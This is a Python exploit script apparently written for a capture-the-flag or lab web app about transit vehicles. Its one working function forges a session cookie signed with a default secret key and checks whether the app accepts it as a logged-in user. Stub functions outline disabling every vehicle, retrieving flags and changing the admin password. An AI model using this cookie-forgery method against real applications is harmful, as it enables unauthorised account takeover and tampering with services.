
import random
import requests
import logging

from typing import Optional
from bs4 import BeautifulSoup

from exploit_module.common import DEFAULT_SECRET_KEY
from exploit_module.common import USER_AGENT
from exploit_module.common import create_cookie

_logger = logging.getLogger(__name__)

def check_fake_cookie_on_admin(domain="http://127.0.0.1:5002", endpoint="/account", username=None) -> bool:
    if username is None:
        # Generate 10 random ascii characters for the username
        username = ''.join(random.choices('abcdefghijklmnopqrstuvwxyz', k=10))
    
    # Create a cookie with a fake signed secret key
    cookie = create_cookie(username)
    
    # Create the cookie dictionary
    cookies = {
        "session": cookie
    }
    
    url = f"{domain}{endpoint}"
    # Send a request to the admin endpoint with the fake cookie
    response = requests.get(url, cookies=cookies, headers={"User-Agent": USER_AGENT}, verify=False)
    
    html_parsed = BeautifulSoup(response.text, 'lxml')
    # The username is inside a bolded string in a paragraph tag, and the only one on the page.
    # So find it, and check that the username matches the one we set in the cookie.
    first_paragraph = html_parsed.find('p')
    if first_paragraph is None:
        _logger.info(f"[-] Failed to access admin endpoint on {domain}. No paragraph tag found in response.")
        return False
    if first_paragraph.find('strong'):
        strong_tag = first_paragraph.find('strong')
        if strong_tag is None:
            _logger.info(f"[-] Failed to access admin endpoint on {domain}. No strong tag found in response.")
            return False
        templated_username = strong_tag.text
        if templated_username == username:
            _logger.info(f"[+] Successfully accessed admin endpoint on {domain} as {username}")
            return True
        else:
            _logger.warning(f"[-] Admin endpoint on {domain} did not return the expected username. Got {templated_username} instead of {username}")
            return False
    else:
        _logger.info(f"[-] Failed to access admin endpoint on {domain}. No strong tag found in response.")
        return False

def login_admin(username='Administrator', password='password', domain="http://localhost:5002", endpoint="/auth/login") -> str:
    # TODO: This will do a real login to the admin panel, and save the cookie for future use
    raise NotImplementedError("This method is not implemented yet. TODO: Implement this method to log in to the admin panel and save the cookie for future use.")

def register_admin(username='Administrator', password='password', domain="http://localhost:5002", endpoint="/auth/register") -> str:
    # TODO: This should register a real user, and then save the credentials for future login attempts.
    raise NotImplementedError("This method is not implemented yet. TODO: Implement this method to register a user on the admin panel and save the cookie for future use.")

def disabled_all_vehicles_on_admin(domain="http://localhost:5002", cookie: Optional[str] = None) -> bool:
    # TODO: Hit the api/vehicles endpoint to get all the vehicle data,
    # TODO: Then use each vehicles not disabled to hit /api/vehicles/<vehicle_id>/status with payload {"status": False} to disable
    raise NotImplementedError("This method is not implemented yet. TODO: Implement this method to disable all vehicles on the admin panel, which will cause the bus and train flags to drop.")

def get_train_flag_on_admin(domain="http://localhost:5002", cookie: Optional[str] = None) -> Optional[str]:
    # TODO: Disable the vehicles, then hit /api/vehicles/<vehicle_type>/flag to get the flag for the train, which should be returned in the response.
    raise NotImplementedError("This method is not implemented yet. TODO: Implement this method to get the train flag from the admin panel.")

def get_bus_flag_on_admin(domain="http://localhost:5002", cookie: Optional[str] = None) -> Optional[str]:
    # TODO: Disable the vehicles, then hit /api/vehicles/<vehicle_type>/flag to get the flag for the train, which should be returned in the response.
    raise NotImplementedError("This method is not implemented yet. TODO: Implement this method to get the train flag from the admin panel.")

def change_password_on_admin(domain="http://localhost:5002", cookie: Optional[str] = None, new_password: str = "tacocatcat1234!") -> bool:
    # TODO: Using the cookie for the admin panel, post a form to /account to change the password for the last logged in user
    raise NotImplementedError("This method is not implemented yet. TODO: Implement this method to change the password for the logged in user on the admin panel, which will cause the bus and train flags to drop if the fake cookie works.")